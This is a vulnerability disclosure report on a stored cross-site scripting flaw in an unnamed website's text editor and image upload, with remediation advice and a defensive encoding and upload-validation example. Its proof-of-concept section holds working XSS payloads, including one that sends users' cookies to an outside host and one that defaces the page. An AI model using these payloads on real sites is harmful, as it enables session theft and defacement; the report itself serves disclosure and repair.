XSS Vulnerability Report

What is XSS?

Cross-Site Scripting (XSS) is a vulnerability in which malicious scripts are injected into a trusted website. It can occur wherever a web application accepts user input without validating or sanitising it. Such scripts are run by the user's web browser because they appear to come from a trusted source. They have the same level of access as the website itself, meaning full access to browser cookies, session tokens, and other sensitive data, and they can also modify other parts of the page, such as its HTML.

How was it discovered?

REDACTED until the vulnerability is fixed or until 6 months have passed

Effects of XSS

  • Scripts being run in users' browsers
  • Users' cookies, session tokens, and other sensitive data being stolen
  • The website being defaced
  • Users being redirected off site
  • User data being accessed by non-trusted users

Immediate Recommendations

Our immediate recommendation is to sanitise user input from all sources, regardless of whether the user is logged in. This would stop the script from being saved to the server and served to other users, so XSS would no longer be viable from the textbox after saving. It does not, however, fix the problem of the script executing when switching from the HTML view. That could be fixed by deleting the script tags from the HTML in the textbox, in the same way a header tag is currently handled. The fix for the file upload vulnerability is to check that the uploaded file is actually an image and only then pass it on to the further checks for image size, etc. This should also mean that the file is not displayed after uploading unless it passed that check. We would also recommend that you give us permission to carry out a full penetration test of the website, so we can discover any further vulnerabilities it may have.
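The two recommendations above, as an added example that is not code from this report or from the affected site: untrusted text is output-encoded before it is placed into the page so a stored payload is displayed rather than executed, and an upload is accepted as an image only if its leading bytes match a known image signature, not its extension or declared type. The comment template, the accepted image types and the sample inputs are assumptions made for the demo; stripping tags from the rich-text HTML view itself needs an allowlist-based HTML sanitiser, which this snippet does not replace.

```javascript
// Added example (not the report's own code): output-encode untrusted text
// before it goes into HTML, and check uploads by magic bytes rather than by
// extension or Content-Type. Sample payloads and file headers are constructed.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

// Encode the five characters that can break out of an HTML text or
// attribute context, so user input is shown literally instead of parsed.
function escapeHtml(input) {
  return String(input).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hypothetical comment template: the saved text is escaped on output, so a
// stored <script> payload is rendered as text rather than executed.
function renderComment(comment) {
  return `<div class="comment">${escapeHtml(comment)}</div>`;
}

// Magic-byte signatures for the image types the upload form should accept
// (assumed set for the demo).
const IMAGE_SIGNATURES = [
  { type: 'image/png',  bytes: [0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a] },
  { type: 'image/jpeg', bytes: [0xff, 0xd8, 0xff] },
  { type: 'image/gif',  bytes: [0x47, 0x49, 0x46, 0x38] },
];

// Return the detected image type, or null when the file does not start with
// a known image signature (e.g. an HTML document renamed to .png). Only a
// non-null result should be passed on to the size and other checks.
function detectImageType(buf) {
  for (const sig of IMAGE_SIGNATURES) {
    if (buf.length >= sig.bytes.length && sig.bytes.every((b, i) => buf[i] === b)) {
      return sig.type;
    }
  }
  return null;
}

// Constructed sample inputs: the report's first PoC payload and two "uploads".
const storedPayload = '<script>alert(document.domain)</script>';
const pngUpload  = Buffer.from([0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a, 0x00]);
const htmlUpload = Buffer.from('<script>alert(1)</script>', 'utf8');

console.log(renderComment(storedPayload));          // payload shown as inert text
console.log(detectImageType(pngUpload));            // image/png
console.log(detectImageType(htmlUpload));           // null: rejected before any further checks
```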

Proof of concept

<!-- Creates a pop-up showing the domain the script is executing on -->
<script>alert(document.domain)</script>

<!-- Redirects users to an attacker-owned site and passes the user's cookies along -->
<script type="text/javascript">
document.location="http://192.168.0.48:5000/?c="+document.cookie;
</script>

<!-- Replaces the whole website with the word HACKED -->
<script>
const element = document.getElementById("app");
element.innerHTML = "HACKED";
</script>

References:
  • GitHub issue about XSS
  • Website explaining XSS